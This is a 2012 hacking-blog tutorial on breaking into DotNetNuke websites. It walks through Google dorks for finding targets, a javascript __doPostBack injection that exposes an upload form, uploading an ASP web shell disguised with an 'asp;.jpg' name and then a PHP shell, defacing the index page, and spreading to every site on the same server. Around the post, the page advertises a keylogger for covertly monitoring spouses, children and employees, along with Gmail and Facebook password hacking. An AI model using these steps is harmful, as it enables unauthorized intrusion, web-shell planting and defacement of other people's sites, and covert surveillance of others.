Latest: Hack Facebook Password! | Wants To Hack CellPhone | Trace Mobile Number(only US) ! | New : Best FUD Keylogger!

Featured Posts

hack mobile

Sunday, July 22, 2012

How To Hack Websites Using DotNetNuke Exploit + Shell Uploading

Posted by wildrank on Sunday, July 22, 2012
Hello everyone!! Previously we have discussed about "How to Hack Website Using Havij SQL Injection". Today,I am going to tell about one more very usefull but old method which you can used to hack website using Dot net nuke(DNN) exploit. I know some of you know about this method DNN but it is very good exploit to hack dot net sites. By using this DNN exploit, you can even hack all sites which are hosted on same server. Also you can upload any file using it. It is easy method as compared to other hacking attacks such as SQL-Injection and Cross Site Scripting etc.

Yet I have explained following tutorials about Website Hacking

ok..now come to topic...

What is DNN (Dot Net Nuke) ?

DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.

Step 1: First go to google.com search page and use this following dork to find vulnerable site.

inurl:home/tabid/36/language/en-US/Default.aspx

another dorks you can use

inurl:fcklinkgallery.aspx
inurl:/portals/0

Step 2: Now open any site from the search list like

http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx

Now replace "home/tabid/36/language/en-US/Default.aspx"           with                 Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

so your url will become

http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

then hit enter

Step 3: Now there are 2 possibilities

if u get Link Gallery url select then site is not vulnerable , see the image below


and If you get Like shown in below image then target is vulnerable


ok now if you find a vulnerable site move to next step

Step 4: Now you can see 3 options there and we neeed to select “File in your site”.


Step 5: Now after selecting 3 options, we need to use a javascript code. For that we need to use that browser which supports javascript. So i use Opera Mini .

Before using javascript, first we need to choose file location as root, after that clear everything written on browser url and paste the below javascript only.

javascript:__doPostBack('ctlURL$cmdUpload','')

Step 6: After inject the above javascript code in browser address bar, you will get upload option instead of selection option.


Step 7: Now you have to upload your shell.

Note : But remember you cant upload your shell directly in .php format and not even you can do anything by uploading .php.jpg

So for this purpose first we need to upload a special type of shell which is specially coded in asp.

Download the shell :- For more ASP shell goto www.sh3ll.org .

Now rename your asp shell to

yourshell.asp;.jpg

and upload it.

After uploading you can access your ASP shell by going to this address,

http://www.vulsite.com/portals/0/yourshell.asp;.jpg



Step 8: Now upload your php shell using upload file option marked in above image.

After uploading php shell you can access it by going to this address,

http://www.vulsite.com/portals/0/yourphpshell.php

Step 9: Now replace your index.html with original index.html. Thats it.

Well you can also hack all sites which are hosted on same server.

For that follow the bellow image and click on Drives you will find all sites hosted on same server.

Click on any one site and follow the above process to upload you shell.

Happy website hacking!!!



If you enjoyed this post and wish to be informed whenever a new post is published, then make sure you subscribe to my regular Email Updates. Subscribe Now!



Do you need to know what your child is doing on the computer? Do you want to know what your loved ones or spouse or kids are doing on the computer? Do you need to monitor what your employees are doing during work hours? Are they working or playing?

Winspy Keylogger is intended to help you in these kind of situations. It can show you exactly what is being done on the computer at any time.

Click Here To Download Winspy Keylogger
 
  • Gmail Hacking

    Wants to hack Gmail a/c password ? Learn best way to hack Gmail password..

  • Jailbreak Iphone/iPad

    Jailbreak your Iphone or iPad to give it more functionality free of cost...

  • Facebook Hacking

    Wants to hack Facebook password? But Don't Know Where to Start? Learn here......

  • MAC Keylogger

    Learn how to hack emails account password on MAC OS using keylogger....

  • Mobile Hacking

    Monitor mobiles,Records the activities of anyone who uses iPhone, BlackBerry....

Disclaimer

ALL INFORMATION / TUTORIALS WRITTEN ON WILDHACKER.COM ARE FOR EDUCATIONAL PURPOSES ONLY, THE SITE WILDHACKER.COM IS NOT RESPONSIBLE IN ANY WAY FOR HOW THIS INFORMATION IS USED, YOU USE IT AT YOUR OWN RISK. YOU MAY LEARN ALSO HOW TO GET YOUR OWN ACCOUNT BACK FROM ALL THIS INFRORMATION.

Recipes

Unlock Iphone Website Hacking

Facebook Hacking Keylogger

Unlock Blackberry Unlock Modem

Gmail Hacking Hack Yahoo

Hotmail Hacking Remote Hacking

Blog Archive

Traffic / Ranking

Powered by:

Wild Hacker © 2012. All Rights Reserved | Contact | Bloggers.com